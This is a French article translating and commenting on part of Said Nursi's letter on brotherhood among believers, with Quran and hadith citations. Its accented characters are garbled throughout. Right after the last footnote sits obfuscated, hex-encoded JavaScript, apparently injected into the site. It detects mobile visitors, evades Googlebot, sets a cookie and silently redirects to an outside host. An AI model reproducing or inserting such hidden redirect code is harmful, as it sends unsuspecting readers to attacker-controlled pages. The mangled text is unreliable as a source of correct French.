Note introductive

Cet article propose une traduction libre, voire une interprA�tation personnelle pour certains passages, de la premiA?re partie traitant de la fraternitA�, du 22A?me chapitre du livre intitulA� Mektubat (Les lettres) de Bediuzzaman Said Nursi, un penseur musulman d’origine kurde qui a vA�cu en Asie mineure fin XIXA?me, dA�but XXA?me siA?cle. Il a notamment laissA� derriA?re lui la collection des Risale-i Nur (TraitA�s de lumiA?re), un ensemble de 14 volumes regroupant quelques 1400 traitA�s dans 6000 pages, le travail de 40 annA�es de sa vie.

Dans ce traitA�, l’auteur exprime son interprA�tation de la tradition islamique vis-A�-vis de la fraternitA� et de la bonne entente. De par le profil de l’auteur, un thA�ologien qui a vouA� sa vie A� l’A�tude, l’interprA�tation et l’enseignement du Coran, il est A�vident que le discours s’adresse en prioritA� au croyant musulman. Le non musulman pourra tout de mA?me y trouver matiA?re A� rA�flexion, en faisant abstraction des arguments religieux ou non d’ailleurs, puisque le fond est universel et fondamentalement centrA� sur l’humain et ses relations A� autrui.


Cette lettre est composA�e de deux sujets. Le premier sujet invite les croyants A� la fraternitA� et A� l’amour (le fait de s’apprA�cier les uns les autres et de se comporter en consA�quence).

Les croyants ne sont que des frA?res. Etablissez la concorde entre vos frA?res, et craignez Allah, afin qu’on vous fasse misA�ricorde.
Al-Hujuraat 10 – Pr. Hamidullah

La bonne action et la mauvaise ne sont pas pareilles. Repousse (le mal) par ce qui est meilleur; et voilA� que celui avec qui tu avais une animositA� devient tel un ami chaleureux.
Fussilat 34 -A�Pr. Hamidullah

[…] qui dA�pensent dans l’aisance et dans l’adversitA�, qui dominent leur rage et pardonnent A� autrui – car Allah aime les bienfaisants -.
Aal-Imran 134 -A�Pr. Hamidullah

La mauvaise entente, les comportements qui divisent, le fait de dA�fendre une partie qui engendre la haine et l’animositA� ainsi que l’obstination et l’envie (la jalousie) chez les croyants sont des choses qui sont moches, rejetA�es (par la religion), nA�fastes, des formes d’oppression (d’injustice) et un poison pour la vie humaine que ce soit du point de vueA�:

  • de la VA�ritA�
  • de la sagesse
  • de l’Islam, qui est la plus A�levA�e des formes d’humanitA� et qui fait acquA�rir A� l’A?tre humain le plus haut degrA�
  • de la vie sociale et la vie privA�e ou
  • de la vie spirituelle de l’individu.

Parmi de nombreuses autres, nous allons traiter 6 facettes de cette vA�ritA�.

PremiA?re facette :A�c’est une injustice du point de vue de la VA�ritA�

A� homme sans pitiA� qui nourrit de la haine et de l’animositA� envers des croyants! ImagineA�que tu es sur un bateau ou bien dans une maison avec 9 autres innocents et 1 criminel sanguinaire. Tu comprends aisA�ment A� quel pointA�un homme qui tenterait de couler ce bateau ou d’incendier cette maison serait injuste. Et tu dA�noncerais cette injustice avec la plus grande force. Et mA?me s’il n’y avait qu’un seul innocent et 9 criminels, couler ce bateau serait un acte qui ne peut prA�tendre A?tre conforme A� aucune loi qui se veut juste.

De la mA?me maniA?re, le croyant est comme un bateau ou une maison qui appartient A� Allah et oA? se trouvent beaucoup deA�qualitA�s innocentes, pas seulement 9 mais peut-A?tre bien une vingtaine, A�comme la foi, la religion et le fait d’A?tre ton voisin. DA?s lors, nourrir de la haine et de l’animositA� envers lui revient A� vouloir le couler, le brA�ler, au sens spirituel, A� cause d’un dA�faut qui t’est nA�faste, que tu n’aimes pas chez lui. Tenter ou vouloir une telle chose est terrible et sinistre.

DeuxiA?me facette : c’est une injustice du point de vue de la sagesse

Il est A�vident que l’amour et l’animositA� sont opposA�s comme le sont la lumiA?re et l’obscuritA�. Les deux ne peuvent jamais exister rA�ellement ensemble au mA?me endroit. Si l’amour, par la grandeur de ses raisons, se trouve rA�ellement dans le coeur, alors l’animositA� n’y trouvera pas sa place, elle restera au sens figurA� et se transformera en pitiA�. En effet, le croyant aime son frA?re et il doit l’aimer. Il n’A�prouvera que de la pitiA� pour ses dA�fauts, il tentera de les corriger non pas par la pression et la tyrannie mais par la bontA� et la gentillesse. C’est pourquoi nous pouvons affirmer, par la clartA� et la certitude du hadith suivant, que :

« Les croyants ne doivent pas rester en froid et cesser de se parler plus de trois jours. »
Mouslim, Birr, 23, 25, 26 – Abou Dawoud, Adab, 47 – Tirmidhi, Birr, 21, 24 – Ibn Maja, Mouqaddima, 7 – Mousnad, 1:176, 183, 3:110, 165, 199, 209, 255, 4:20, 327, 328, 5:416, 421, 422.

Si par contre, l’animositA� aA�des raisons plus fortes et s’installe rA�ellement dans le coeur, alors l’amour n’y trouvera pas sa place, il restera au sens figurA� et se transformera en hypocrisie et en flatteries.

A� homme sans pitiA�! Regarde et voit A� quel point c’est une injustice de nourrir de la haine et de l’animositA� envers ton frA?re. Cette injustice est comparable et aussi moche et absurde que de dire que du gravierA�a plus d’importance et de valeur que la Ka’aba ou le mont Ouhoud. En effet, la foi est aussi sacrA�e que la Ka’abaA�[1]A�et l’Islam est aussi grand que le mont Ouhoud. Ce sont 2 qualitA�s du musulman et il en existent bien d’autres. Alors que ces qualitA�s nA�cessitent l’union et l’amour, avoir de l’animositA� pour des croyants A� cause de dA�fauts qui sont comme du gravier comparA� A� leurs qualitA�s qui sont comme la Ka’aba ou Ouhoud est d’une cruautA� et d’une bA?tiseA�proportionnelle ainsi qu’une grande injustice. Si tu es intelligent, tu le comprendras!A�[2]A�L’unitA� qui vient de la foi requiert l’unitA� des coeurs. L’unitA� dans la croyance requiert l’unitA� dans la sociA�tA�.

En effet, tu ne peux nier que tu ressentiras des affinitA�s et tu te sentiras plus proche de quelqu’un avec qui tu as partagA� ou partage les mA?mes conditions de vie, tu considA?reras cela comme une relation amicale. Pourtant, entre ton frA?re croyant et toi, A� travers la lumiA?re et la conscience qu’apporte la foi, il y a autant A�d’affinitA�s et de raisons de fraternitA� qu’il y a de Noms Divins qu’Allah nous a appris. Par exemple :

  • Votre CrA�ateur (Al-KhA?lik) est Un, votre DA�tenteur (Al-MA?lik) est un, celui que vous adorez (Al-Ma’boud) est un, votre Pourvoyeur (Al-Razzak) est un ainsi que mille autre Noms Divins…
  • Votre prophA?te est le mA?me, votre religion est la mA?me, votre qibla est la mA?meA�ainsi que cent autres exemples…[3]
  • Ensuite votre villeA�est la mA?me, A�votre Etat est le mA?me, votre pays est le mA?me ainsi que dix autres exemples…

L’union de tous ces « uns » requiert l’union et l’alliance, l’amour et la fraternitA� et sont aussi fortes, au sens spirituel, queA�des chaA�nes capables de garder ensemble des planA?tes. Il ne faut donc pas faire primer des choses futiles qui sont aussi faibles, au sens spirituel, que des toiles d’araignA�e et qui mA?nent A� la discorde et l’A�loignement, A� la haine et l’animositA�. Ce serait un grandA�manque de respect envers tous ces liens d’unitA�, une mA�prise des raisons de s’apprA�cier et une injustice envers les liens de fraternitA�s qui nous unissent et ce serait sortir du droit chemin. Si ton coeur n’est pas mort et ton intelligence n’est pas A�teinte, tu le comprendras.


[1]A�Pour les rA�fA�rences sur le fait que la foi donne A� l’homme une valeur supA�rieure A� celle de la Ka‘aba aux yeux d’Allah, voir : Tirmidhi, birr, 85; Ibni Maja, fiten 2; et-TaberA?nA�, el-Moujammoul kabir 11/37.

[2]A�Pour les rA�fA�rA�nces concernant le fait de ne pas mA�priser un croyant A� cause de ses dA�fauts, voir : Sourates Tawba, 9/79; Houjuraat, 49/11; Humazah, 104/1; Hadiths Mouslim, birr 32; Tirmidhi, birr 18; AbouA�Dawoud, Adab 35.))((Pour les rA�fA�rences concernant le fait qu’il ne faut pas rabaisser un croyant pour ses erreurs mais prier pour lui, voir : BoukhhA?rA�, houdoud 4; Abou Dawoud, houdoud 35.

[3]A�Pour les hadiths qui rapportent que tous les A?tres humains ont le mA?me Dieu et qu’ils descendent du mA?me ancA?tre, voir : Ahmed Ibni Hanbel, el-Mousnad A� 5/411; et-TaberA?nA�,el-Moujammoul Awsat 5/86.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}